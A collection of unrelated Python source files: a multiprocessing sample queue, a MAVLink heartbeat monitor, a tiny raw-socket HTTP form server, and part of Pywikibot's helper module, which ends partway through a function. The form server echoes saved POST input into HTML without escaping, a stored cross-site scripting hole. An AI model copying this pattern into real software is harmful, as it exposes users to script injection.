| source | python |
|---|---|
multiproc_data.py
|
from __future__ import print_function
from ctypes import c_bool
import multiprocessing as mp
try:
from queue import Full as QFullExcept
from queue import Empty as QEmptyExcept
except ImportError:
from Queue import Full as QFullExcept
from Queue import Empty as QEmptyExcept
import numpy as np
class MPData(object):
"""
Handles multi-process data generation.
Operation:
- call start() to start the data generation.
- call get() (blocking) to read one sample
- call reset() to stop data generation
"""
def __init__(self, num_processes, max_queue_size, fn):
self.queue = mp.Queue(maxsize=int(max_queue_size))
self.alive = mp.Value(c_bool, False, lock=False)
self.num_proc = num_processes
self.proc = list()
self.fn = fn
def start(self):
self._init_proc()
@staticmethod
def _proc_loop(proc_id, alive, queue, fn):
"""
proc_id: int
Process id
alive: multiprocessing.Value
variable for signaling whether process should continue or not
queue: multiprocessing.Queue
queue for passing data back
fn: function
func obj that returns a sample to be pushed into the queue
"""
print('proc {} started'.format(proc_id))
try:
while alive.value:
data = fn()
put_success = False
while alive.value and not put_success:
try:
queue.put(data, timeout=0.5)
put_success = True
except QFullExcept:
pass
except KeyboardInterrupt:
print("W: interrupt received, stopping process {} ...".format(proc_id))
print("closing process {}".format(proc_id))
queue.close()
def _init_proc(self):
if not self.proc:
self.proc = [mp.Process(target=self._proc_loop, args=(i, self.alive, self.queue, self.fn)) for i in range(self.num_proc)]
self.alive.value = True
for p in self.proc:
p.start()
def get(self):
self._init_proc()
return self.queue.get()
def reset(self):
self.alive.value = False
qsize = 0
try:
while True:
self.queue.get(timeout=0.1)
qsize += 1
except QEmptyExcept:
pass
print("Queue size on reset: {}".format(qsize))
for i, p in enumerate(self.proc):
p.join()
del self.proc[:]  # list.clear() exists only on Python 3; this works on both
|
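A minimal usage sketch for the MPData class above, assuming the module is importable as `multiproc_data` and that `fn` returns a picklable sample (the NumPy call here is purely illustrative):

```python
import numpy as np

from multiproc_data import MPData  # assumed import path


def make_sample():
    # Called inside each worker process to produce one sample.
    return np.random.rand(4)


if __name__ == '__main__':
    data = MPData(num_processes=2, max_queue_size=16, fn=make_sample)
    data.start()
    try:
        for _ in range(8):
            sample = data.get()  # blocks until a worker pushes a sample
            print(sample.shape)
    finally:
        data.reset()             # stop the workers and drain the queue
```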
mavtop.py
|
from __future__ import print_function
import sys,os
import curses
import time
import threading
from pymavlink import mavutil
from argparse import ArgumentParser
from Vehicle import Vehicle
from Screen import Screen
list = []
def findvehicle(id, list):
for i in range(0, len(list)):
if (id == list[i].sys_id):
return i
return -1
def draw_menu(stdscr):
k = 0
global list
screen = Screen()
# Clear and refresh the screen for a blank canvas
stdscr.clear()
stdscr.refresh()
# Start colors in curses
curses.start_color()
curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_BLACK)
curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK)
curses.init_pair(3, curses.COLOR_BLACK, curses.COLOR_WHITE)
curses.init_pair(4, curses.COLOR_BLACK, curses.COLOR_CYAN)
# Loop where k is the last character pressed
while (k != ord('q')):
# Initialization
stdscr.clear()
height, width = stdscr.getmaxyx()
screen.setSize(height, width)
screen.moveCursor(stdscr, k)
cursor_y = screen.getCursor()
cursor_x = screen.getCursorX()
# Render Elements
screen.drawHeader(stdscr, list)
screen.drawTable(stdscr, list)
screen.drawStatusBar(stdscr)
# Refresh the screen
stdscr.refresh()
# Wait for next input
k = stdscr.getch()
def mavlinkThread():
connection = mavutil.mavlink_connection('udpin:0.0.0.0:14550')
global list
while True:
msg = connection.recv_match(type='HEARTBEAT', blocking=True)
sys_id = connection.target_system
vehicle_id = findvehicle(sys_id, list)
sys_status = msg.system_status
mav_type = msg.type
mav_autopilot = msg.autopilot
mav_mode_flag = msg.base_mode
mavlink_version = msg.mavlink_version
if vehicle_id < 0 :
vehicle = Vehicle(sys_id, mav_type, mav_autopilot, mav_mode_flag, sys_status, mavlink_version) # Create vehicle object if the vehicle was not seen before
list.append(vehicle)
else:
list[vehicle_id].sys_id = sys_id
list[vehicle_id].mav_state = msg.system_status
def main():
parser = ArgumentParser(description=__doc__)
parser.add_argument("--baudrate", type=int,
help="master port baud rate", default=115200)
parser.add_argument("--device", required=False, help="serial device")
args = parser.parse_args()
t = threading.Thread(name='daemon', target=mavlinkThread)
t.daemon = True  # setDaemon() is deprecated in favour of the daemon attribute
t.start()
curses.wrapper(draw_menu)
if __name__ == "__main__":
main()
|
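mavtop.py imports Vehicle and Screen from local modules that are not part of this listing. A minimal stand-in for Vehicle, consistent with how the constructor is called and which attributes mavlinkThread() reads, might look like the sketch below (attribute names other than sys_id and mav_state are assumptions):

```python
class Vehicle(object):
    """Hypothetical stand-in for the Vehicle module used by mavtop.py."""

    def __init__(self, sys_id, mav_type, mav_autopilot, mav_mode_flag,
                 sys_status, mavlink_version):
        self.sys_id = sys_id                # MAVLink system id (read by findvehicle)
        self.mav_type = mav_type            # MAV_TYPE enum value
        self.mav_autopilot = mav_autopilot  # MAV_AUTOPILOT enum value
        self.mav_mode_flag = mav_mode_flag  # base_mode bit field
        self.mav_state = sys_status         # MAV_STATE, updated on every heartbeat
        self.mavlink_version = mavlink_version
```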
server_TCP_modified.py
|
import socket
import threading
host = '127.0.0.1'
port = 9999
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.bind((host,port))
sock.listen(5)
saved = b''
def tcplink(conn, addr):
global saved
# print(conn, addr)
request = conn.recv(1024)
if request[0:3] == b'GET':
# HTTP response message
response = b'HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n' \
b'<html><body><form method="post"><input name="name" value="' + saved + b'">' \
b'<button type="submit">Save</button></form></body></html>'
conn.sendall(response)
elif request[0:4] == b"POST":
pos = request.find(b"\r\n\r\n")
content = request[pos + 4:]
response = b'HTTP/1.1 303 See Other\r\n' \
b'Location:/\r\n\r\n'
saved = content[5:]  # strip the leading b'name=' field prefix from the form body
conn.sendall(response)
# print(content)
# print(saved)
conn.close()
def thread_func():
global sock
print("thread started")
while 1:
conn, addr = sock.accept()
tcplink(conn, addr)
num_thread = 8
for i in range(num_thread):
t = threading.Thread(target=thread_func)
t.start()
|
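A small client sketch for exercising the server above (it assumes the server is already running locally; each request is sent in a single write to mirror the single recv(1024) the handler performs):

```python
import socket


def send_request(raw_request, host='127.0.0.1', port=9999):
    """Send one raw HTTP request and return the full response bytes."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.sendall(raw_request)
    reply = b''
    while True:
        chunk = s.recv(4096)
        if not chunk:       # server closes the connection after responding
            break
        reply += chunk
    s.close()
    return reply


# Store a value: the handler keeps everything after b'name=' in `saved`.
send_request(b'POST / HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\nname=hello')

# Read the form back: the stored value is echoed into the input field.
print(send_request(b'GET / HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n').decode('utf-8', 'replace'))
```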
__init__.py
|
# -*- coding: utf-8 -*-
"""Miscellaneous helper functions (not wiki-dependent)."""
#
# (C) Pywikibot team, 2008-2017
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, unicode_literals
__version__ = '$Id: 7e1c9c15b0d121bbe9e36717aa3be86d42ac86c0 $'
import collections
import gzip
import hashlib
import inspect
import itertools
import os
import re
import stat
import subprocess
import sys
import threading
import time
import types
from distutils.version import Version
from warnings import warn
PYTHON_VERSION = sys.version_info[:3]
PY2 = (PYTHON_VERSION[0] == 2)
if not PY2:
import queue as Queue
StringTypes = basestring = (str,)
UnicodeType = unicode = str
else:
import Queue
StringTypes = types.StringTypes
UnicodeType = types.UnicodeType
from pywikibot.logging import debug
try:
import bz2
except ImportError as bz2_import_error:
try:
import bz2file as bz2
warn('package bz2 was not found; using bz2file', ImportWarning)
except ImportError:
warn('package bz2 and bz2file were not found', ImportWarning)
bz2 = bz2_import_error
if PYTHON_VERSION < (3, 5):
# getargspec is deprecated in Python 3, but no deprecation message was emitted until 3.5
ArgSpec = inspect.ArgSpec
getargspec = inspect.getargspec
else:
ArgSpec = collections.namedtuple('ArgSpec', ['args', 'varargs', 'keywords',
'defaults'])
def getargspec(func):
"""Python 3 implementation using inspect.signature."""
sig = inspect.signature(func)
args = []
defaults = []
varargs = None
kwargs = None
for p in sig.parameters.values():
if p.kind == inspect.Parameter.VAR_POSITIONAL:
varargs = p.name
elif p.kind == inspect.Parameter.VAR_KEYWORD:
kwargs = p.name
else:
args += [p.name]
if p.default != inspect.Parameter.empty:
defaults += [p.default]
if defaults:
defaults = tuple(defaults)
else:
defaults = None
return ArgSpec(args, varargs, kwargs, defaults)
_logger = 'tools'
class _NotImplementedWarning(RuntimeWarning):
"""Feature that is no longer implemented."""
pass
class NotImplementedClass(object):
"""No implementation is available."""
def __init__(self, *args, **kwargs):
"""Constructor."""
raise NotImplementedError(
'%s: %s' % (self.__class__.__name__, self.__doc__))
if PYTHON_VERSION < (2, 7):
try:
import future.backports.misc
except ImportError:
warn("""
pywikibot support of Python 2.6 relies on package future for many features.
Please upgrade to Python 2.7+ or Python 3.3+, or run:
"pip install future>=0.15.0"
""", RuntimeWarning)
try:
from ordereddict import OrderedDict
except ImportError:
class OrderedDict(NotImplementedClass):
"""OrderedDict not found."""
pass
try:
from counter import Counter
except ImportError:
class Counter(NotImplementedClass):
"""Counter not found."""
pass
count = None
else:
Counter = future.backports.misc.Counter
OrderedDict = future.backports.misc.OrderedDict
try:
count = future.backports.misc.count
except AttributeError:
warn('Please update the "future" package to at least version '
'0.15.0 to use its count.', RuntimeWarning, 2)
count = None
del future
if count is None:
def count(start=0, step=1):
"""Backported C{count} to support keyword arguments and step."""
while True:
yield start
start += step
else:
Counter = collections.Counter
OrderedDict = collections.OrderedDict
count = itertools.count
def has_module(module):
"""Check whether a module can be imported."""
try:
__import__(module)
except ImportError:
return False
else:
return True
def empty_iterator():
# http://stackoverflow.com/a/13243870/473890
"""An iterator which does nothing."""
return
yield
def py2_encode_utf_8(func):
"""Decorator to optionally encode the string result of a function on Python 2.x."""
if PY2:
return lambda s: func(s).encode('utf-8')
else:
return func
class classproperty(object): # flake8: disable=N801
"""
Descriptor to access a class method as a property.
This class may be used as a decorator::
class Foo(object):
_bar = 'baz' # a class property
@classproperty
def bar(cls): # a class property method
return cls._bar
Foo.bar gives 'baz'.
"""
def __init__(self, cls_method):
"""Hold the class method."""
self.method = cls_method
def __get__(self, instance, owner):
"""Get the attribute of the owner class by its method."""
return self.method(owner)
class UnicodeMixin(object):
"""Mixin class to add __str__ method in Python 2 or 3."""
@py2_encode_utf_8
def __str__(self):
"""Return the unicode representation as the str representation."""
return self.__unicode__()
# From http://python3porting.com/preparing.html
class ComparableMixin(object):
"""Mixin class to allow comparing to other objects which are comparable."""
def __lt__(self, other):
"""Compare if self is less than other."""
return other > self._cmpkey()
def __le__(self, other):
"""Compare if self is less equals other."""
return other >= self._cmpkey()
def __eq__(self, other):
"""Compare if self is equal to other."""
return other == self._cmpkey()
def __ge__(self, other):
"""Compare if self is greater equals other."""
return other <= self._cmpkey()
def __gt__(self, other):
"""Compare if self is greater than other."""
return other < self._cmpkey()
def __ne__(self, other):
"""Compare if self is not equal to other."""
return other != self._cmpkey()
class DotReadableDict(UnicodeMixin):
"""Parent class of Revision() and FileInfo().
Provide:
- __getitem__(), __unicode__() and __repr__().
"""
def __getitem__(self, key):
"""Give access to class values by key.
Revision class may also give access to its values by keys,
e.g. the revid parameter may be accessed either as revision['revid']
or as revision.revid. This makes formatting strings with the
% operator easier.
"""
return getattr(self, key)
def __unicode__(self):
"""Return string representation."""
# TODO: This is more efficient if the PY2 test is done during
# class instantiation, and not inside the method.
if not PY2:
return repr(self.__dict__)
else:
_content = u', '.join(
u'{0}: {1}'.format(k, v) for k, v in self.__dict__.items())
return u'{{{0}}}'.format(_content)
def __repr__(self):
"""Return a more complete string representation."""
return repr(self.__dict__)
class FrozenDict(dict):
"""
Frozen dict, preventing write after initialisation.
Raises TypeError if write attempted.
"""
def __init__(self, data=None, error=None):
"""
Constructor.
@param data: mapping to freeze
@type data: mapping
@param error: error message
@type error: basestring
"""
if data:
args = [data]
else:
args = []
super(FrozenDict, self).__init__(*args)
self._error = error or 'FrozenDict: not writable'
def update(self, *args, **kwargs):
"""Prevent updates."""
raise TypeError(self._error)
__setitem__ = update
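# Illustrative sketch (not part of the original module): FrozenDict accepts an
# initial mapping but rejects any later write with the configured error message.
#     d = FrozenDict({'a': 1}, error='read-only mapping')
#     d['a']          # -> 1
#     d['b'] = 2      # raises TypeError('read-only mapping')
#     d.update(b=2)   # raises TypeError as well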
def concat_options(message, line_length, options):
"""Concatenate options."""
indent = len(message) + 2
line_length -= indent
option_msg = u''
option_line = u''
for option in options:
if option_line:
option_line += ', '
# +1 for ','
if len(option_line) + len(option) + 1 > line_length:
if option_msg:
option_msg += '\n' + ' ' * indent
option_msg += option_line[:-1] # remove space
option_line = ''
option_line += option
if option_line:
if option_msg:
option_msg += '\n' + ' ' * indent
option_msg += option_line
return u'{0} ({1}):'.format(message, option_msg)
class LazyRegex(object):
"""
Regex object that obtains and compiles the regex on usage.
Instances behave like the object created using L{re.compile}.
"""
def __init__(self, pattern, flags=0):
"""
Constructor.
@param pattern: L{re} regex pattern
@type pattern: str or callable
@param flags: L{re.compile} flags
@type flags: int
"""
self.raw = pattern
self.flags = flags
super(LazyRegex, self).__init__()
@property
def raw(self):
"""Get raw property."""
if callable(self._raw):
self._raw = self._raw()
return self._raw
@raw.setter
def raw(self, value):
"""Set raw property."""
self._raw = value
self._compiled = None
@property
def flags(self):
"""Get flags property."""
return self._flags
@flags.setter
def flags(self, value):
"""Set flags property."""
self._flags = value
self._compiled = None
def __getattr__(self, attr):
"""Compile the regex and delegate all attribute to the regex."""
if self._raw:
if not self._compiled:
self._compiled = re.compile(self.raw, self.flags)
if hasattr(self._compiled, attr):
return getattr(self._compiled, attr)
raise AttributeError('%s: attr %s not recognised'
% (self.__class__.__name__, attr))
else:
raise AttributeError('%s.raw not set' % self.__class__.__name__)
class DeprecatedRegex(LazyRegex):
"""Regex object that issues a deprecation notice."""
def __init__(self, pattern, flags=0, name=None, instead=None):
"""
Constructor.
If name is None, the regex pattern will be used as part of
the deprecation warning.
@param name: name of the object that is deprecated
@type name: str or None
@param instead: if provided, will be used to specify the replacement
of the deprecated name
@type instead: str
"""
super(DeprecatedRegex, self).__init__(pattern, flags)
self._name = name or self.raw
self._instead = instead
def __getattr__(self, attr):
"""Issue deprecation warning."""
issue_deprecation_warning(
self._name, self._instead, 2)
return super(DeprecatedRegex, self).__getattr__(attr)
def first_lower(string):
"""
Return a string with the first character uncapitalized.
Empty strings are supported. The original string is not changed.
"""
return string[:1].lower() + string[1:]
def first_upper(string):
"""
Return a string with the first character capitalized.
Empty strings are supported. The original string is not changed.
"""
return string[:1].upper() + string[1:]
def normalize_username(username):
"""Normalize the username."""
if not username:
return None
username = re.sub('[_ ]+', ' ', username).strip()
return first_upper(username)
class MediaWikiVersion(Version):
"""
Version object to allow comparing 'wmf' versions with normal ones.
The version mainly consists of digits separated by periods. After that comes a
suffix, which may only be 'wmf<number>', 'alpha', 'beta<number>' or
'-rc.<number>' (the - and . are optional). These are ordered from old to
new in that order, with a version number without a suffix considered the
newest. This secondary difference is stored in an internal _dev_version
attribute.
Two versions are equal if their normal version and dev version are equal. A
version is greater if the normal version or dev version is greater. For
example:
1.24 < 1.24.1 < 1.25wmf1 < 1.25alpha < 1.25beta1 < 1.25beta2
< 1.25-rc.1 < 1.25-rc.2 < 1.25
Any other suffixes are considered invalid.
"""
MEDIAWIKI_VERSION = re.compile(
r'^(\d+(?:\.\d+)+)(-?wmf\.?(\d+)|alpha|beta(\d+)|-?rc\.?(\d+)|.*)?$')
@classmethod
def from_generator(cls, generator):
"""Create instance using the generator string."""
if not generator.startswith('MediaWiki '):
raise ValueError('Generator string ({0!r}) must start with '
'"MediaWiki "'.format(generator))
return cls(generator[len('MediaWiki '):])
def parse(self, vstring):
"""Parse version string."""
version_match = MediaWikiVersion.MEDIAWIKI_VERSION.match(vstring)
if not version_match:
raise ValueError('Invalid version number "{0}"'.format(vstring))
components = [int(n) for n in version_match.group(1).split('.')]
# The _dev_version numbering scheme might change. E.g. if a stage
# between 'alpha' and 'beta' is added, 'beta', 'rc' and stable releases
# are reassigned (beta=3, rc=4, stable=5).
if version_match.group(3): # wmf version
self._dev_version = (0, int(version_match.group(3)))
elif version_match.group(4):
self._dev_version = (2, int(version_match.group(4)))
elif version_match.group(5):
self._dev_version = (3, int(version_match.group(5)))
elif version_match.group(2) in ('alpha', '-alpha'):
self._dev_version = (1, )
else:
for handled in ('wmf', 'alpha', 'beta', 'rc'):
# if any of those pops up here our parser has failed
assert handled not in version_match.group(2), \
'Found "{0}" in "{1}"'.format(handled, version_match.group(2))
if version_match.group(2):
debug('Additional unused version part '
'"{0}"'.format(version_match.group(2)),
_logger)
self._dev_version = (4, )
self.suffix = version_match.group(2) or ''
self.version = tuple(components)
def __str__(self):
"""Return version number with optional suffix."""
return '.'.join(str(v) for v in self.version) + self.suffix
def _cmp(self, other):
if isinstance(other, basestring):
other = MediaWikiVersion(other)
if self.version > other.version:
return 1
if self.version < other.version:
return -1
if self._dev_version > other._dev_version:
return 1
if self._dev_version < other._dev_version:
return -1
return 0
if PY2:
__cmp__ = _cmp
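# Illustrative sketch (not part of the original module): wmf/alpha/beta/rc builds
# sort before the plain release carrying the same version number.
#     MediaWikiVersion('1.25wmf4') < MediaWikiVersion('1.25')      # True
#     MediaWikiVersion('1.24.1') < MediaWikiVersion('1.25beta1')   # True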
class ThreadedGenerator(threading.Thread):
"""Look-ahead generator class.
Runs a generator in a separate thread and queues the results; can
be called like a regular generator.
Subclasses should override self.generator, I{not} self.run
Important: the generator thread will stop itself if the generator's
internal queue is exhausted; but, if the calling program does not use
all the generated values, it must call the generator's stop() method to
stop the background thread. Example usage:
>>> gen = ThreadedGenerator(target=range, args=(20,))
>>> try:
... data = list(gen)
... finally:
... gen.stop()
>>> data
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19]
"""
def __init__(self, group=None, target=None, name="GeneratorThread",
args=(), kwargs=None, qsize=65536):
"""Constructor. Takes same keyword arguments as threading.Thread.
target must be a generator function (or other callable that returns
an iterable object).
@param qsize: The size of the lookahead queue. The larger the qsize,
the more values will be computed in advance of use (which can eat
up memory and processor time).
@type qsize: int
"""
if kwargs is None:
kwargs = {}
if target:
self.generator = target
if not hasattr(self, "generator"):
raise RuntimeError("No generator for ThreadedGenerator to run.")
self.args, self.kwargs = args, kwargs
threading.Thread.__init__(self, group=group, name=name)
self.queue = Queue.Queue(qsize)
self.finished = threading.Event()
def __iter__(self):
"""Iterate results from the queue."""
if not self.isAlive() and not self.finished.isSet():
self.start()
# if there is an item in the queue, yield it, otherwise wait
while not self.finished.isSet():
try:
yield self.queue.get(True, 0.25)
except Queue.Empty:
pass
except KeyboardInterrupt:
self.stop()
def stop(self):
"""Stop the background thread."""
self.finished.set()
def run(self):
"""Run the generator and store the results on the queue."""
iterable = any(hasattr(self.generator, key)
for key in ('__iter__', '__getitem__'))
if iterable and not self.args and not self.kwargs:
self.__gen = self.generator
else:
self.__gen = self.generator(*self.args, **self.kwargs)
for result in self.__gen:
while True:
if self.finished.isSet():
return
try:
self.queue.put_nowait(result)
except Queue.Full:
time.sleep(0.25)
continue
break
# wait for queue to be emptied, then kill the thread
while not self.finished.isSet() and not self.queue.empty():
time.sleep(0.25)
self.stop()
def itergroup(iterable, size):
"""Make an iterator that returns lists of (up to) size items from iterable.
Example:
>>> i = itergroup(range(25), 10)
>>> print(next(i))
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> print(next(i))
[10, 11, 12, 13, 14, 15, 16, 17, 18, 19]
>>> print(next(i))
[20, 21, 22, 23, 24]
>>> print(next(i))
Traceback (most recent call last):
...
StopIteration
"""
group = []
for item in iterable:
group.append(item)
if len(group) == size:
yield group
group = []
if group:
yield group
def islice_with_ellipsis(iterable, *args, **kwargs):
u"""
Generator which yields the first n elements of the iterable.
If more elements are available and marker is True, it returns an extra
string marker as continuation mark.
The function takes the same positional arguments as itertools.islice,
plus the additional keyword argument marker.
@param iterable: the iterable to work on
@type iterable: iterable
@param args: same args as:
- C{itertools.islice(iterable, stop)}
- C{itertools.islice(iterable, start, stop[, step])}
@keyword marker: element to yield if iterable still contains elements
after showing the required number.
Default value: '…'
No other kwargs are considered.
@type marker: str
"""
s = slice(*args)
marker = kwargs.pop('marker', '…')
try:
k, v = kwargs.popitem()
raise TypeError(
"islice_with_ellipsis() take only 'marker' as keyword arg, not %s"
% k)
except KeyError:
pass
_iterable = iter(iterable)
for el in itertools.islice(_iterable, *args):
yield el
if marker and s.stop is not None:
try:
next(_iterable)
except StopIteration:
pass
else:
yield marker
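# Illustrative sketch (not part of the original module): when the iterable has
# more elements than requested, the marker is appended.
#     list(islice_with_ellipsis(range(10), 3))                # [0, 1, 2, '…']
#     list(islice_with_ellipsis(range(3), 5))                 # [0, 1, 2]
#     list(islice_with_ellipsis(range(10), 3, marker='...'))  # [0, 1, 2, '...']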
class ThreadList(list):
"""A simple threadpool class to limit the number of simultaneous threads.
Any threading.Thread object can be added to the pool using the append()
method. If the maximum number of simultaneous threads has not been reached,
the Thread object will be started immediately; if not, the append() call
will block until the thread is able to start.
>>> pool = ThreadList(limit=10)
>>> def work():
... time.sleep(1)
...
>>> for x in range(20):
... pool.append(threading.Thread(target=work))
...
"""
_logger = "threadlist"
def __init__(self, limit=128, *args):
"""Constructor."""
self.limit = limit
super(ThreadList, self).__init__(*args)
for item in self:
if not isinstance(item, threading.Thread):
raise TypeError("Cannot add '%s' to ThreadList" % type(item))
def active_count(self):
"""Return the number of alive threads, and delete all non-alive ones."""
cnt = 0
for item in self[:]:
if item.isAlive():
cnt += 1
else:
self.remove(item)
return cnt
def append(self, thd):
"""Add a thread to the pool and start it."""
if not isinstance(thd, threading.Thread):
raise TypeError("Cannot append '%s' to ThreadList" % type(thd))
while self.active_count() >= self.limit:
time.sleep(2)
super(ThreadList, self).append(thd)
thd.start()
debug("thread %d ('%s') started" % (len(self), type(thd)),
self._logger)
def stop_all(self):
"""Stop all threads the pool."""
if self:
debug(u'EARLY QUIT: Threads: %d' % len(self), self._logger)
for thd in self:
thd.stop()
debug(u'EARLY QUIT: Queue size left in %s: %s'
% (thd, thd.queue.qsize()), self._logger)
def intersect_generators(genlist):
"""
Intersect generators listed in genlist.
Yield items only if they are yielded by all generators in genlist.
Threads (via ThreadedGenerator) are used in order to run generators
in parallel, so that items can be yielded before generators are
exhausted.
Threads are stopped when they are either exhausted or Ctrl-C is pressed.
Quitting before all generators are finished is attempted if
there is no more chance of finding an item in all queues.
@param genlist: list of page generators
@type genlist: list
"""
# If any generator is empty, no pages are going to be returned
for source in genlist:
if not source:
debug('At least one generator ({0!r}) is empty and execution was '
'skipped immediately.'.format(source), 'intersect')
return
# Item is cached to check that it is found n_gen
# times before being yielded.
cache = collections.defaultdict(set)
n_gen = len(genlist)
# Class to keep track of alive threads.
# Start new threads and remove completed threads.
thrlist = ThreadList()
for source in genlist:
threaded_gen = ThreadedGenerator(name=repr(source), target=source)
threaded_gen.daemon = True
thrlist.append(threaded_gen)
while True:
# Get items from queues in a round-robin way.
for t in thrlist:
try:
# TODO: evaluate if True and timeout is necessary.
item = t.queue.get(True, 0.1)
# Cache entry is a set of threads.
# Duplicates from same thread are not counted twice.
cache[item].add(t)
if len(cache[item]) == n_gen:
yield item
# Remove item from cache.
# No chance of seeing it again (see later: early stop).
cache.pop(item)
active = thrlist.active_count()
max_cache = n_gen
if cache.values():
max_cache = max(len(v) for v in cache.values())
# No. of active threads is not enough to reach n_gen.
# We can quit even if some thread is still active.
# There could be an item in all generators which has not yet
# appeared from any generator. Only once we have lost at least one
# generator can we bail out early based on the items seen so far.
if active < n_gen and n_gen - max_cache > active:
thrlist.stop_all()
return
except Queue.Empty:
pass
except KeyboardInterrupt:
thrlist.stop_all()
finally:
# All threads are done.
if thrlist.active_count() == 0:
return
def filter_unique(iterable, container=None, key=None, add=None):
"""
Yield unique items from an iterable, omitting duplicates.
By default, to provide uniqueness, it puts the generated items into
the keys of a dict created as a local variable, each with a value of True.
It only yields items which are not already present in the local dict.
For large collections, this is not memory efficient, as a strong reference
to every item is kept in a local dict which can not be cleared.
Also, the local dict can't be re-used when chaining unique operations on
multiple generators.
To avoid these issues, it is advisable for the caller to provide their own
container and set the key parameter to be the function L{hash}, or use a
L{weakref} as the key.
The container can be any object that supports __contains__.
If the container is a set or dict, the method add or __setitem__ will be
used automatically. Any other method may be provided explicitly using the
add parameter.
Beware that key=id is only useful for cases where id() is not unique.
Note: This is not thread safe.
@param iterable: the source iterable
@type iterable: collections.Iterable
@param container: storage of seen items
@type container: type
@param key: function to convert the item to a key
@type key: callable
@param add: function to add an item to the container
@type add: callable
"""
if container is None:
container = {}
if not add:
if hasattr(container, 'add'):
def container_add(x):
container.add(key(x) if key else x)
add = container_add
else:
def container_setitem(x):
container.__setitem__(key(x) if key else x,
True)
add = container_setitem
for item in iterable:
try:
if (key(item) if key else item) not in container:
add(item)
yield item
except StopIteration:
return
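# Illustrative sketch (not part of the original module): duplicates are dropped
# while the original order is preserved; a caller-supplied set also works.
#     list(filter_unique([1, 2, 1, 3, 2]))           # [1, 2, 3]
#     seen = set()
#     list(filter_unique('abcabc', container=seen))  # ['a', 'b', 'c']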
class CombinedError(KeyError, IndexError):
"""An error that gets caught by both KeyError and IndexError."""
class EmptyDefault(str, collections.Mapping):
"""
A default for a non-existing siteinfo property.
It should be chosen if there is no better default known. It acts like an
empty collection, so it can safely be iterated through if treated as a
list, tuple, set or dictionary. It is also basically an empty string.
Accessing a value via __getitem__ will result in a combined KeyError and
IndexError.
"""
def __init__(self):
"""Initialise the default as an empty string."""
str.__init__(self)
def _empty_iter(self):
"""An iterator which does nothing and drops the argument."""
return empty_iterator()
def __getitem__(self, key):
"""Raise always a L{CombinedError}."""
raise CombinedError(key)
iteritems = itervalues = iterkeys = __iter__ = _empty_iter
EMPTY_DEFAULT = EmptyDefault()
class SelfCallMixin(object):
"""
Return self when called.
When '_own_desc' is defined it'll also issue a deprecation warning using
issue_deprecation_warning('Calling ' + _own_desc, 'it directly').
"""
def __call__(self):
"""Do nothing and just return itself."""
if hasattr(self, '_own_desc'):
issue_deprecation_warning('Calling {0}'.format(self._own_desc),
'it directly', 2)
return self
class SelfCallDict(SelfCallMixin, dict):
"""Dict with SelfCallMixin."""
class SelfCallString(SelfCallMixin, str):
"""Unicode string with SelfCallMixin."""
class IteratorNextMixin(collections.Iterator):
"""Backwards compatibility for Iterators."""
if PY2:
def next(self):
"""Python 2 next."""
return self.__next__()
class DequeGenerator(IteratorNextMixin, collections.deque):
"""A generator that allows items to be added during generating."""
def __next__(self):
"""Python 3 iterator method."""
if len(self):
return self.popleft()
else:
raise StopIteration
class ContextManagerWrapper(object):
"""
Wraps an object in a context manager.
It redirects all attribute access to the wrapped object and executes 'close'
when used as a context manager in with-statements. In such statements the
value bound via 'as' is the wrapped object itself. For example:
>>> class Wrapper(object):
... def close(self): pass
>>> an_object = Wrapper()
>>> wrapped = ContextManagerWrapper(an_object)
>>> with wrapped as another_object:
... assert another_object is an_object
It does not subclass the object though, so isinstance checks will fail
outside a with-statement.
"""
def __init__(self, wrapped):
"""Create a new wrapper."""
super(ContextManagerWrapper, self).__init__()
super(ContextManagerWrapper, self).__setattr__('_wrapped', wrapped)
def __enter__(self):
"""Enter a context manager and use the wrapped object directly."""
return self._wrapped
def __exit__(self, exc_type, exc_value, traceback):
"""Call close on the wrapped object when exiting a context manager."""
self._wrapped.close()
def __getattr__(self, name):
"""Get the attribute from the wrapped object."""
return getattr(self._wrapped, name)
def __setattr__(self, name, value):
"""Set the attribute in the wrapped object."""
setattr(self._wrapped, name, value)
def open_archive(filename, mode='rb', use_extension=True):
"""
Open a file and uncompress it if needed.
This function supports bzip2, gzip and 7zip as compression containers. It
uses the standard library packages for bzip2 and gzip, so those are always
available. 7z archives are supported only when a 7za program is available,
and only for reading.
The compression type is detected either via the magic number or the file
extension.
@param filename: The filename.
@type filename: str
@param use_extension: Use the file extension instead of the magic number
to determine the type of compression (default True). Must be True when
writing or appending.
@type use_extension: bool
@param mode: The mode in which the file should be opened. It may either be
'r', 'rb', 'a', 'ab', 'w' or 'wb'. All modes open the file in binary
mode. It defaults to 'rb'.
@type mode: string
@raises ValueError: When 7za is not available or the opening mode is unknown
or it tries to write a 7z archive.
@raises FileNotFoundError: When the filename doesn't exist and it tries
to read from it or it tries to determine the compression algorithm (or
IOError on Python 2).
@raises OSError: When it's not a 7z archive but the file extension is 7z.
It is also raised by bz2 when its content is invalid. gzip does not
immediately raise that error but only on reading it.
@return: A file-like object returning the uncompressed data in binary mode.
Before Python 2.7 the GzipFile object and before 2.7.1 the BZ2File are
wrapped in a ContextManagerWrapper with its advantages/disadvantages.
@rtype: file-like object
"""
def wrap(wrapped, sub_ver):
"""Wrap in a wrapper when this is below Python version 2.7."""
if PYTHON_VERSION < (2, 7, sub_ver):
return ContextManagerWrapper(wrapped)
else:
return wrapped
if mode in ('r', 'a', 'w'):
mode += 'b'
elif mode not in ('rb', 'ab', 'wb'):
raise ValueError('Invalid mode: "{0}"'.format(mode))
if use_extension:
# rfind() returns -1 when there is no '.', so the slice below yields an
# empty extension in that case; otherwise the leading period is stripped
extension = filename[filename.rfind('.'):][1:]
else:
if mode != 'rb':
raise ValueError('Magic number detection only when reading')
with open(filename, 'rb') as f:
magic_number = f.read(8)
if magic_number.startswith(b'BZh'):
extension = 'bz2'
elif magic_number.startswith(b'\x1F\x8B\x08'):
extension = 'gz'
elif magic_number.startswith(b"7z\xBC\xAF'\x1C"):
